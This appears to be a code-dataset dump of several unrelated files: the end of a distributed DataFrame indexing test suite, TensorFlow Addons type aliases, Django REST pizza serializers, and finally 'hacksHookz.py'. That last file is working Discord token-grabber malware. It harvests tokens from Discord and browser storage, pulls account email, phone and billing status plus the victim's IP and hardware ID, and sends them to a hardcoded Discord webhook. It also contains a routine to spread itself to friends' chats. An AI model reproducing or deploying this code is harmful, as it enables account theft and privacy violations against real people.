pd.testing.assert_index_equal(c1.index_value.to_pandas(), c2.index_value.to_pandas())
pd.testing.assert_index_equal(c1.columns_value.to_pandas(), c2.columns_value.to_pandas())
if isinstance(c2.op, DataFrameIlocSetItem):
self.assertEqual(c1.key, c2.inputs[0].key)
else:
self.assertEqual(c1.key, c2.key)
self.assertEqual(df7.chunks[1].op.indexes, (1, 0))
series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
series.iloc[:4] = 2
series = series.tiles()
self.assertEqual(series.shape, (10,))
self.assertEqual(len(series.chunks), 4)
self.assertEqual(series.chunks[0].op.indexes, [slice(None, None, None), ])
self.assertEqual(series.chunks[0].op.value, 2)
self.assertEqual(series.chunks[1].op.indexes, [slice(0, 1, 1), ])
self.assertEqual(series.chunks[1].op.value, 2)
series = md.Series(pd.Series(np.arange(10)), chunk_size=3)
series.iloc[[2, 4, 9]] = 3
series = series.tiles()
self.assertEqual(series.shape, (10,))
self.assertEqual(len(series.chunks), 4)
self.assertEqual(series.chunks[0].index, (0,))
self.assertEqual(series.chunks[0].op.indexes[0].tolist(), [2])
self.assertEqual(series.chunks[0].op.value, 3)
self.assertEqual(series.chunks[1].index, (1,))
self.assertEqual(series.chunks[1].op.indexes[0].tolist(), [1])
self.assertEqual(series.chunks[1].op.value, 3)
self.assertEqual(series.chunks[3].index, (3,))
self.assertEqual(series.chunks[3].op.indexes[0].tolist(), [0])
self.assertEqual(series.chunks[3].op.value, 3)
def testDataFrameLoc(self):
raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
index=['a1', 'a2', 'a3'], columns=['x', 'y', 'z'])
df = md.DataFrame(raw, chunk_size=2)
raw2 = raw.copy()
raw2.reset_index(inplace=True, drop=True)
df3 = md.DataFrame(raw2, chunk_size=2)
s = pd.Series([1, 3, 5], index=['a1', 'a2', 'a3'])
series = md.Series(s, chunk_size=2)
df2 = df.loc['a1', 'z']
self.assertIsInstance(df2, Tensor)
self.assertEqual(df2.shape, ())
self.assertEqual(df2.dtype, raw['z'].dtype)
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 1)
self.assertIsInstance(df2.chunks[0], TENSOR_CHUNK_TYPE)
df2 = df.loc[:, 'y']
self.assertIsInstance(df2, Series)
self.assertEqual(df2.shape, (3,))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertEqual(df2.name, 'y')
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertIsInstance(c.index_value.to_pandas(), type(raw.index))
self.assertEqual(c.name, 'y')
self.assertEqual(c.dtype, raw['y'].dtype)
df2 = df.loc['a2', :]
self.assertIsInstance(df2, Series)
self.assertEqual(df2.shape, (3,))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.columns_value.to_pandas())
self.assertEqual(df2.name, 'a2')
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertIsInstance(c.index_value.to_pandas(), type(raw.columns))
self.assertEqual(c.name, 'a2')
self.assertEqual(c.dtype, raw.loc['a2'].dtype)
df2 = df.loc['a2': 'a3', 'y': 'z']
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.loc[:, 'y': 'z'].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, 'y': 'z'].dtypes)
df2 = df.loc[['a3', 'a2'], [True, False, True]]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, [True, False, True]].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
df2 = df.loc[md.Series(['a3', 'a2']), [True, False, True]]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 2))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, [True, False, True]].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, [True, False, True]].dtypes)
df2 = df.loc[[True, False, True], ['z', 'x', 'y']]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 3))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(),
raw.loc[:, ['z', 'x', 'y']].columns)
pd.testing.assert_series_equal(df2.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
df2 = df2.tiles()
self.assertEqual(len(df2.chunks), 2)
for c in df2.chunks:
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
pd.testing.assert_index_equal(c.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(c.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(c.columns_value.to_pandas(),
raw.loc[:, ['z', 'x', 'y']].columns)
pd.testing.assert_series_equal(c.dtypes, raw.loc[:, ['z', 'x', 'y']].dtypes)
df2 = df.loc[md.Series([True, False, True])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 3))
pd.testing.assert_index_equal(df2.index_value.to_pandas(), df.index_value.to_pandas())
self.assertNotEqual(df2.index_value.key, df.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
df2 = df3.loc[md.Series([True, False, True])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (np.nan, 3))
self.assertIsInstance(df2.index_value.to_pandas(), type(raw.loc[[True, False, True]].index))
self.assertNotEqual(df2.index_value.key, df3.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
df2 = df3.loc[md.Series([2, 1])]
self.assertIsInstance(df2, DataFrame)
self.assertEqual(df2.shape, (2, 3))
self.assertIsInstance(df2.index_value.to_pandas(), type(raw2.loc[[2, 1]].index))
self.assertNotEqual(df2.index_value.key, df3.index_value.key)
pd.testing.assert_index_equal(df2.columns_value.to_pandas(), raw.columns)
pd.testing.assert_series_equal(df2.dtypes, raw.dtypes)
series2 = series.loc['a2']
self.assertIsInstance(series2, Tensor)
self.assertEqual(series2.shape, ())
self.assertEqual(series2.dtype, s.dtype)
series2 = series.loc[['a2', 'a3']]
self.assertIsInstance(series2, Series)
self.assertEqual(series2.shape, (2,))
self.assertEqual(series2.dtype, s.dtype)
self.assertEqual(series2.name, s.name)
with self.assertRaises(IndexingError):
_ = df.loc['a1', 'z', ...]
with self.assertRaises(NotImplementedError):
_ = df.loc[:, md.Series([True, False, True])]
with self.assertRaises(KeyError):
_ = df.loc[:, ['non_exist']]
def testLocUseIloc(self):
raw = pd.DataFrame([[1, 3, 3], [4, 2, 6], [7, 8, 9]],
columns=['x', 'y', 'z'])
df = md.DataFrame(raw, chunk_size=2)
self.assertIsInstance(df.loc[:3].op, DataFrameIlocGetItem)
self.assertIsInstance(df.loc[1:3].op, DataFrameIlocGetItem)
self.assertIsInstance(df.loc[1].op, DataFrameIlocGetItem)
self.assertIsInstance(df.loc[:-3].op, DataFrameLocGetItem)
with self.assertRaises(KeyError):
_ = df.loc[-3]
self.assertIsInstance(df.loc[:3, :'y'].op, DataFrameLocGetItem)
self.assertIsInstance(df.loc[:3, [True, False, True]].op, DataFrameLocGetItem)
self.assertIsInstance(df.loc[[True, False, True]].op, DataFrameLocGetItem)
raw2 = raw.copy()
raw2.index = pd.RangeIndex(1, 4)
df2 = md.DataFrame(raw2, chunk_size=2)
self.assertIsInstance(df2.loc[:3].op, DataFrameLocGetItem)
self.assertIsInstance(df2.loc['a3':].op, DataFrameLocGetItem)
raw2 = raw.copy()
raw2.index = [f'a{i}' for i in range(3)]
df2 = md.DataFrame(raw2, chunk_size=2)
self.assertIsInstance(df2.loc[:3].op, DataFrameLocGetItem)
def testDataFrameGetitem(self):
data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
df = md.DataFrame(data, chunk_size=2)
series = df['c3']
self.assertIsInstance(series, Series)
self.assertEqual(series.shape, (10,))
self.assertEqual(series.name, 'c3')
self.assertEqual(series.dtype, data['c3'].dtype)
self.assertEqual(series.index_value, df.index_value)
series = series.tiles()
self.assertEqual(series.nsplits, ((2, 2, 2, 2, 2),))
self.assertEqual(len(series.chunks), 5)
for i, c in enumerate(series.chunks):
self.assertIsInstance(c, SERIES_CHUNK_TYPE)
self.assertEqual(c.index, (i,))
self.assertEqual(c.shape, (2,))
df1 = df[['c1', 'c2', 'c3']]
self.assertIsInstance(df1, DataFrame)
self.assertEqual(df1.shape, (10, 3))
self.assertEqual(df1.index_value, df.index_value)
pd.testing.assert_index_equal(df1.columns_value.to_pandas(), data[['c1', 'c2', 'c3']].columns)
pd.testing.assert_series_equal(df1.dtypes, data[['c1', 'c2', 'c3']].dtypes)
df1 = df1.tiles()
self.assertEqual(df1.nsplits, ((2, 2, 2, 2, 2), (2, 1)))
self.assertEqual(len(df1.chunks), 10)
for i, c in enumerate(df1.chunks[slice(0, 10, 2)]):
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
self.assertEqual(c.index, (i, 0))
self.assertEqual(c.shape, (2, 2))
for i, c in enumerate(df1.chunks[slice(1, 10, 2)]):
self.assertIsInstance(c, DATAFRAME_CHUNK_TYPE)
self.assertEqual(c.index, (i, 1))
self.assertEqual(c.shape, (2, 1))
def testDataFrameGetitemBool(self):
data = pd.DataFrame(np.random.rand(10, 5), columns=['c1', 'c2', 'c3', 'c4', 'c5'])
df = md.DataFrame(data, chunk_size=2)
mask_data1 = data.c1 > 0.5
mask_data2 = data.c1 < 0.5
mask1 = md.Series(mask_data1, chunk_size=2)
mask2 = md.Series(mask_data2, chunk_size=2)
r1 = df[mask1]
r2 = df[mask2]
r3 = df[mask1]
self.assertNotEqual(r1.index_value.key, df.index_value.key)
self.assertNotEqual(r1.index_value.key, mask1.index_value.key)
self.assertEqual(r1.columns_value.key, df.columns_value.key)
self.assertIs(r1.columns_value, df.columns_value)
self.assertNotEqual(r1.index_value.key, r2.index_value.key)
self.assertEqual(r1.columns_value.key, r2.columns_value.key)
self.assertIs(r1.columns_value, r2.columns_value)
self.assertEqual(r1.index_value.key, r3.index_value.key)
self.assertEqual(r1.columns_value.key, r3.columns_value.key)
self.assertIs(r1.columns_value, r3.columns_value)
def testSeriesGetitem(self):
data = pd.Series(np.random.rand(10, ), name='a')
series = md.Series(data, chunk_size=3)
result1 = series[2]
self.assertEqual(result1.shape, ())
result1 = result1.tiles()
self.assertEqual(result1.nsplits, ())
self.assertEqual(len(result1.chunks), 1)
self.assertIsInstance(result1.chunks[0], TENSOR_CHUNK_TYPE)
self.assertEqual(result1.chunks[0].shape, ())
self.assertEqual(result1.chunks[0].dtype, data.dtype)
result2 = series[[4, 5, 1, 2, 3]]
self.assertEqual(result2.shape, (5,))
result2 = result2.tiles()
self.assertEqual(result2.nsplits, ((2, 2, 1),))
self.assertEqual(len(result2.chunks), 3)
self.assertEqual(result2.chunks[0].op.labels, [4, 5])
self.assertEqual(result2.chunks[1].op.labels, [1, 2])
self.assertEqual(result2.chunks[2].op.labels, [3])
data = pd.Series(np.random.rand(10), index=['i' + str(i) for i in range(10)])
series = md.Series(data, chunk_size=3)
result1 = series['i2']
self.assertEqual(result1.shape, ())
result1 = result1.tiles()
self.assertEqual(result1.nsplits, ())
self.assertEqual(result1.chunks[0].dtype, data.dtype)
self.assertTrue(result1.chunks[0].op.labels, ['i2'])
result2 = series[['i2', 'i4']]
self.assertEqual(result2.shape, (2,))
result2 = result2.tiles()
self.assertEqual(result2.nsplits, ((2,),))
self.assertEqual(result2.chunks[0].dtype, data.dtype)
self.assertTrue(result2.chunks[0].op.labels, [['i2', 'i4']])
def testSetitem(self):
data = pd.DataFrame(np.random.rand(10, 2), columns=['c1', 'c2'])
df = md.DataFrame(data, chunk_size=4)
df['new'] = 1
self.assertEqual(df.shape, (10, 3))
pd.testing.assert_series_equal(df.inputs[0].dtypes, data.dtypes)
tiled = df.tiles()
self.assertEqual(tiled.chunks[0].shape, (4, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
self.assertEqual(tiled.chunks[1].shape, (4, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
self.assertEqual(tiled.chunks[2].shape, (2, 3))
pd.testing.assert_series_equal(tiled.inputs[0].dtypes, data.dtypes)
def testResetIndex(self):
data = pd.DataFrame([('bird', 389.0),
('bird', 24.0),
('mammal', 80.5),
('mammal', np.nan)],
index=['falcon', 'parrot', 'lion', 'monkey'],
columns=('class', 'max_speed'))
df = md.DataFrame(data, chunk_size=2).reset_index()
r = data.reset_index()
self.assertEqual(df.shape, (4, 3))
pd.testing.assert_series_equal(df.dtypes, r.dtypes)
pd.testing.assert_index_equal(df.columns_value.to_pandas(), r.columns)
df2 = df.tiles()
self.assertEqual(len(df2.chunks), 2)
self.assertEqual(df2.chunks[0].shape, (2, 3))
pd.testing.assert_index_equal(df2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
pd.testing.assert_series_equal(df2.chunks[0].dtypes, r.dtypes)
self.assertEqual(df2.chunks[1].shape, (2, 3))
pd.testing.assert_index_equal(df2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
pd.testing.assert_series_equal(df2.chunks[1].dtypes, r.dtypes)
df = md.DataFrame(data, chunk_size=1).reset_index(drop=True)
r = data.reset_index(drop=True)
self.assertEqual(df.shape, (4, 2))
pd.testing.assert_series_equal(df.dtypes, r.dtypes)
df2 = df.tiles()
self.assertEqual(len(df2.chunks), 8)
for c in df2.chunks:
self.assertEqual(c.shape, (1, 1))
pd.testing.assert_index_equal(c.index_value.to_pandas(), pd.RangeIndex(c.index[0], c.index[0] + 1))
pd.testing.assert_series_equal(c.dtypes, r.dtypes[c.index[1]: c.index[1] + 1])
series_data = pd.Series([1, 2, 3, 4], name='foo',
index=pd.Index(['a', 'b', 'c', 'd'], name='idx'))
s = md.Series(series_data, chunk_size=2).reset_index()
r = series_data.reset_index()
self.assertEqual(s.shape, (4, 2))
pd.testing.assert_series_equal(s.dtypes, r.dtypes)
s2 = s.tiles()
self.assertEqual(len(s2.chunks), 2)
self.assertEqual(s2.chunks[0].shape, (2, 2))
pd.testing.assert_index_equal(s2.chunks[0].index_value.to_pandas(), pd.RangeIndex(2))
self.assertEqual(s2.chunks[1].shape, (2, 2))
pd.testing.assert_index_equal(s2.chunks[1].index_value.to_pandas(), pd.RangeIndex(2, 4))
with self.assertRaises(TypeError):
md.Series(series_data, chunk_size=2).reset_index(inplace=True)
def testHeadTailOptimize(self):
raw = pd.DataFrame(np.random.rand(4, 3))
df = md.DataFrame(raw, chunk_size=2)
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df.tiles().head(2).op))
df2 = df[df[0] < 0.5].tiles()
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.head(2).op))
df = md.DataFrame(raw, chunk_size=(2, 3))
df2 = df[df[0] < 0.5].tiles()
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[2].op))
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:2:2].op))
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[1:3].op))
self.assertFalse(HeadTailOptimizedOperandMixin._need_tile_head_tail(df2.iloc[:3, :2].op))
def testReindex(self):
raw = pd.DataFrame(np.random.rand(4, 3))
df = md.DataFrame(raw, chunk_size=2)
with self.assertRaises(TypeError):
df.reindex(unknown_arg=1)
with self.assertRaises(ValueError):
df.reindex([1, 2], fill_value=mt.tensor([1, 2]))
| true | true |
1c2cb0851d7ae12834f1df33acbb334bc02d9efe | 1,907 | py | Python | tensorflow_addons/utils/types.py | leondgarse/addons | 6c512e1ec49ae14ca61f1bbf0fd3403204ba21e2 | [
"Apache-2.0"
] | 1,560 | 2018-11-26T23:57:34.000Z | 2022-03-27T10:37:34.000Z | tensorflow_addons/utils/types.py | leondgarse/addons | 6c512e1ec49ae14ca61f1bbf0fd3403204ba21e2 | [
"Apache-2.0"
] | 2,067 | 2018-11-28T04:40:23.000Z | 2022-03-31T11:36:50.000Z | tensorflow_addons/utils/types.py | leondgarse/addons | 6c512e1ec49ae14ca61f1bbf0fd3403204ba21e2 | [
"Apache-2.0"
] | 679 | 2018-11-27T14:39:25.000Z | 2022-03-31T10:09:22.000Z | # Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Types for typing functions signatures."""
from typing import Union, Callable, List
import numpy as np
import tensorflow as tf
# TODO: Remove once https://github.com/tensorflow/tensorflow/issues/44613 is resolved
if tf.__version__[:3] > "2.5":
from keras.engine import keras_tensor
else:
from tensorflow.python.keras.engine import keras_tensor
Number = Union[
float,
int,
np.float16,
np.float32,
np.float64,
np.int8,
np.int16,
np.int32,
np.int64,
np.uint8,
np.uint16,
np.uint32,
np.uint64,
]
Initializer = Union[None, dict, str, Callable, tf.keras.initializers.Initializer]
Regularizer = Union[None, dict, str, Callable, tf.keras.regularizers.Regularizer]
Constraint = Union[None, dict, str, Callable, tf.keras.constraints.Constraint]
Activation = Union[None, str, Callable]
Optimizer = Union[tf.keras.optimizers.Optimizer, str]
TensorLike = Union[
List[Union[Number, list]],
tuple,
Number,
np.ndarray,
tf.Tensor,
tf.SparseTensor,
tf.Variable,
keras_tensor.KerasTensor,
]
FloatTensorLike = Union[tf.Tensor, float, np.float16, np.float32, np.float64]
AcceptableDTypes = Union[tf.DType, np.dtype, type, int, str, None]
| 30.269841 | 85 | 0.695857 |
from typing import Union, Callable, List
import numpy as np
import tensorflow as tf
if tf.__version__[:3] > "2.5":
from keras.engine import keras_tensor
else:
from tensorflow.python.keras.engine import keras_tensor
Number = Union[
float,
int,
np.float16,
np.float32,
np.float64,
np.int8,
np.int16,
np.int32,
np.int64,
np.uint8,
np.uint16,
np.uint32,
np.uint64,
]
Initializer = Union[None, dict, str, Callable, tf.keras.initializers.Initializer]
Regularizer = Union[None, dict, str, Callable, tf.keras.regularizers.Regularizer]
Constraint = Union[None, dict, str, Callable, tf.keras.constraints.Constraint]
Activation = Union[None, str, Callable]
Optimizer = Union[tf.keras.optimizers.Optimizer, str]
TensorLike = Union[
List[Union[Number, list]],
tuple,
Number,
np.ndarray,
tf.Tensor,
tf.SparseTensor,
tf.Variable,
keras_tensor.KerasTensor,
]
FloatTensorLike = Union[tf.Tensor, float, np.float16, np.float32, np.float64]
AcceptableDTypes = Union[tf.DType, np.dtype, type, int, str, None]
| true | true |
1c2cb09439a11a7a92dc1017034e4a2e9a57e03f | 1,476 | py | Python | app/pizzas/serializers.py | jmorakuebler/tdp-pizza-api | 3920919701d41cf75296e1081cf4defb85fad468 | [
"MIT"
] | null | null | null | app/pizzas/serializers.py | jmorakuebler/tdp-pizza-api | 3920919701d41cf75296e1081cf4defb85fad468 | [
"MIT"
] | null | null | null | app/pizzas/serializers.py | jmorakuebler/tdp-pizza-api | 3920919701d41cf75296e1081cf4defb85fad468 | [
"MIT"
] | null | null | null | from rest_framework import serializers
from pizzas import models
class IngredientSerializer(serializers.ModelSerializer):
"""Serializador para el objeto Ingredient"""
class Meta:
model = models.Ingredient
fields = ('id', 'name', 'get_category_display', 'category')
read_only_fields = ('id', 'get_category_display')
extra_kwargs = {
'category': {'write_only': True},
}
class PizzaSerializer(serializers.ModelSerializer):
"""Serializador para el objeto Pizza"""
class Meta:
model = models.Pizza
fields = ('id', 'name', 'price', 'total_ingredients')
read_only_fields = ('id', 'total_ingredients')
class PizzaDetailSerializer(PizzaSerializer):
"""Serializador para creación y actualización de una Pizza"""
class Meta(PizzaSerializer.Meta):
fields = ('id', 'name', 'price', 'is_active', 'ingredients')
class PizzaDetailInfoSerializer(PizzaDetailSerializer):
"""Serializador para visualización de una Pizza"""
ingredients = IngredientSerializer(many=True, read_only=True)
class PizzaIngredientSerializer(PizzaSerializer):
"""Serializador para agregar y quitar ingredientes de una Pizza"""
class Meta(PizzaSerializer.Meta):
fields = ('ingredients',)
class PizzaIngredientSerializer2(serializers.Serializer):
"""Serializador para agregar y quitar ingredientes de una Pizza"""
ingredient_ids = serializers.CharField(max_length=250)
| 32.8 | 70 | 0.705962 | from rest_framework import serializers
from pizzas import models
class IngredientSerializer(serializers.ModelSerializer):
class Meta:
model = models.Ingredient
fields = ('id', 'name', 'get_category_display', 'category')
read_only_fields = ('id', 'get_category_display')
extra_kwargs = {
'category': {'write_only': True},
}
class PizzaSerializer(serializers.ModelSerializer):
class Meta:
model = models.Pizza
fields = ('id', 'name', 'price', 'total_ingredients')
read_only_fields = ('id', 'total_ingredients')
class PizzaDetailSerializer(PizzaSerializer):
class Meta(PizzaSerializer.Meta):
fields = ('id', 'name', 'price', 'is_active', 'ingredients')
class PizzaDetailInfoSerializer(PizzaDetailSerializer):
ingredients = IngredientSerializer(many=True, read_only=True)
class PizzaIngredientSerializer(PizzaSerializer):
class Meta(PizzaSerializer.Meta):
fields = ('ingredients',)
class PizzaIngredientSerializer2(serializers.Serializer):
ingredient_ids = serializers.CharField(max_length=250)
| true | true |
1c2cb0bcd2f2e830ce4e0630d46c7f42a87405bb | 8,194 | py | Python | hacksHookz.py | malxcolm/fontsontiktok | 19ea5bb09c2d1310741d09aacb7a6cd4ba06dcf2 | [
"Apache-2.0"
] | null | null | null | hacksHookz.py | malxcolm/fontsontiktok | 19ea5bb09c2d1310741d09aacb7a6cd4ba06dcf2 | [
"Apache-2.0"
] | null | null | null | hacksHookz.py | malxcolm/fontsontiktok | 19ea5bb09c2d1310741d09aacb7a6cd4ba06dcf2 | [
"Apache-2.0"
] | null | null | null | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
print("[= ]")
print("[=========]")
print("you shouldnt open this malware well taking your data")
print("clone=NgCoDe")
print("NGCODE IS = rt34-b")
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me", headers=getheaders(token))).read().decode())
except:
pass
def gettokens(path):
path += "\\Local Storage\\leveldb"
tokens = []
for file_name in os.listdir(path):
if not file_name.endswith(".log") and not file_name.endswith(".ldb"):
continue
for line in [x.strip() for x in open(f"{path}\\{file_name}", errors="ignore").readlines() if x.strip()]:
for regex in (r"[\w-]{24}\.[\w-]{6}\.[\w-]{27}", r"mfa\.[\w-]{84}"):
for token in findall(regex, line):
tokens.append(token)
return tokens
def getdeveloper():
dev = "wodx"
try:
dev = urlopen(Request("https://pastebin.com/raw/ssFxiejv")).read().decode()
except:
pass
return dev
def getip():
ip = "None"
try:
ip = urlopen(Request("https://api.ipify.org")).read().decode().strip()
except:
pass
return ip
def getavatar(uid, aid):
url = f"https://cdn.discordapp.com/avatars/{uid}/{aid}.gif"
try:
urlopen(Request(url))
except:
url = url[:-4]
return url
def gethwid():
p = Popen("wmic csproduct get uuid", shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
return (p.stdout.read() + p.stderr.read()).decode().split("\n")[1]
def getfriends(token):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/relationships", headers=getheaders(token))).read().decode())
except:
pass
def getchat(token, uid):
try:
return loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/channels", headers=getheaders(token), data=dumps({"recipient_id": uid}).encode())).read().decode())["id"]
except:
pass
def has_payment_methods(token):
try:
return bool(len(loads(urlopen(Request("https://discordapp.com/api/v6/users/@me/billing/payment-sources", headers=getheaders(token))).read().decode())) > 0)
except:
pass
def send_message(token, chat_id, form_data):
try:
urlopen(Request(f"https://discordapp.com/api/v6/channels/{chat_id}/messages", headers=getheaders(token, "multipart/form-data; boundary=---------------------------325414537030329320151394843687"), data=form_data.encode())).read().decode()
except:
pass
def spread(token, form_data, delay):
return # Remove to re-enabled
for friend in getfriends(token):
try:
chat_id = getchat(token, friend["id"])
send_message(token, chat_id, form_data)
except Exception as e:
pass
sleep(delay)
def main():
cache_path = ROAMING + "\\.cache~$"
prevent_spam = True
self_spread = True
embeds = []
working = []
checked = []
already_cached_tokens = []
working_ids = []
ip = getip()
pc_username = os.getenv("UserName")
pc_name = os.getenv("COMPUTERNAME")
user_path_name = os.getenv("userprofile").split("\\")[2]
developer = getdeveloper()
for platform, path in PATHS.items():
if not os.path.exists(path):
continue
for token in gettokens(path):
if token in checked:
continue
checked.append(token)
uid = None
if not token.startswith("mfa."):
try:
uid = b64decode(token.split(".")[0].encode()).decode()
except:
pass
if not uid or uid in working_ids:
continue
user_data = getuserdata(token)
if not user_data:
continue
working_ids.append(uid)
working.append(token)
username = user_data["username"] + "#" + str(user_data["discriminator"])
user_id = user_data["id"]
avatar_id = user_data["avatar"]
avatar_url = getavatar(user_id, avatar_id)
email = user_data.get("email")
phone = user_data.get("phone")
nitro = bool(user_data.get("premium_type"))
billing = bool(has_payment_methods(token))
embed = {
"color": 0x0eec59,
"fields": [
{
"name": "**Account Info**",
"value": f'Email: {email}\nPhone: {phone}\nNitro: {nitro}\nBilling Info: {billing}',
"inline": True
},
{
"name": "**PC Info**",
"value": f'IP: {ip}\nUsername: {pc_username}\nPC Name: {pc_name}\nToken Location: {platform}',
"inline": True
},
{
"name": "**Token**",
"value": token,
"inline": False
}
],
"author": {
"name": f"{username} ({user_id})",
"icon_url": avatar_url
},
"footer": {
"text": f"Token grabber by THC4L"
}
}
embeds.append(embed)
with open(cache_path, "a") as file:
for token in checked:
if not token in already_cached_tokens:
file.write(token + "\n")
if len(working) == 0:
working.append('123')
webhook = {
"content": "",
"embeds": embeds,
"username": "HackzHook",
"avatar_url": ""
}
try:
urlopen(Request("https://discord.com/api/webhooks/894240616073035836/eRCYt8KsbaNUyHsoG0lyljTw_oWwGsnrVfOT6mFINkTKKkni7rgsxOaanRg-Qeq_DJTE", data=dumps(webhook).encode(), headers=getheaders()))
except:
pass
if self_spread:
for token in working:
with open(argv[0], encoding="utf-8") as file:
content = file.read()
payload = f'-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="file"; filename="{__file__}"\nContent-Type: text/plain\n\n{content}\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="content"\n\nserver crasher. python download: https://www.python.org/downloads\n-----------------------------325414537030329320151394843687\nContent-Disposition: form-data; name="tts"\n\nfalse\n-----------------------------325414537030329320151394843687--'
Thread(target=spread, args=(token, payload, 7500 / 1000)).start()
try:
main()
except Exception as e:
print(e)
pass
print("downloaded HackzHook")
| 21.118557 | 546 | 0.545521 | import os
if os.name != "nt":
exit()
from re import findall
from json import loads, dumps
from base64 import b64decode
from subprocess import Popen, PIPE
from urllib.request import Request, urlopen
from datetime import datetime
from threading import Thread
from time import sleep
from sys import argv
print("[= ]")
print("[=========]")
print("you shouldnt open this malware well taking your data")
print("clone=NgCoDe")
print("NGCODE IS = rt34-b")
LOCAL = os.getenv("LOCALAPPDATA")
ROAMING = os.getenv("APPDATA")
PATHS = {
"Discord" : ROAMING + "\\Discord",
"Discord Canary" : ROAMING + "\\discordcanary",
"Discord PTB" : ROAMING + "\\discordptb",
"Google Chrome" : LOCAL + "\\Google\\Chrome\\User Data\\Default",
"Opera" : ROAMING + "\\Opera Software\\Opera Stable",
"Brave" : LOCAL + "\\BraveSoftware\\Brave-Browser\\User Data\\Default",
"Yandex" : LOCAL + "\\Yandex\\YandexBrowser\\User Data\\Default"
}
def getheaders(token=None, content_type="application/json"):
headers = {
"Content-Type": content_type,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}
if token:
headers.update({"Authorization": token})
return headers
def getuserdata(token):
try:
